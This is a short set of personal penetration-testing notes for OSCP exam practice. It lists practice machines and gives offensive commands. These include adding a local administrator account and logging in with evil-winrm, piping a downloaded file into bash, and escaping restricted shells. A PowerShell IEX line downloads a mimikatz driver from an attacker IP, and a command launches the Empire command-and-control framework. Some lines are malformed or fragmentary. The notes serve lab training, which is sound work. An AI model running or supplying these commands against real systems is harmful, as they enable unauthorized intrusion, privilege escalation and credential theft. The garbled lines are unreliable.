Notes

God notes 
Sec-Cheatsheets/OSCP at master · brianlam38/Sec-Cheatsheets
GitHub
PG boxes on OSCP: 
​https://defaultcredentials.com/oscp/best-active-directory-practice-for-oscp/​
Heist, Hutch, Vault in PG Practice,Resourced 
HTB: 
APT, Fuse, Cascade, Monterverde,Resolute,Forest, Arkham, Active, Mantis 
Cyber Seclabs:
zero, Secret,Brute, Dictionary, Roast, Spray, Sync, Toast 
Always look for config files if you have access to application files!
adds an admini account to the hosts 
Try legion script for nmap scanning! 
always do nmap -sC (default scripts) 
​
If you are a service account you can create an admin account. 
net user gori | passwd123! /add; net localgroup administrators gori /add
evil-winrm -i IP -u gori -p 'passwd123!' to login as the account you just created 
net user gori to check priv
​
---
/etc/apache2 ;look for config files
 
linux enum 
ldd --version 
Transfer module
curl IP/file_name | bash (to execute it) 
cat /etc/lsb-release 
​
Transfer method 
python -m SimpleHTTPserver 80 
-> curl -o outputfile IP/filename 
​
Restricted shell? Try this:
ssh [email protected] -t "bash --noprofile"  
​
[email protected]:~$ BASH_CMDS[a]=/bin/sh;a 
​
$ /bin/bash
bash: groups: command not found
[email protected]:~$ export PATH=$PATH:/bin/
[email protected]:~$ export PATH=$PATH:/usr/bin


---
Run sudo 
​
IEX(New-Object Net.WebClient).downloadString('http://192.168.119.146:8080/mimidrv.sys')
​
docker run -it --name empire -v empire-data:/opt/Empire/data \
 -p 443:443 --entrypoint bash empireproject/empire
Oracle exploitation:
default credentials
Last modified 1yr ago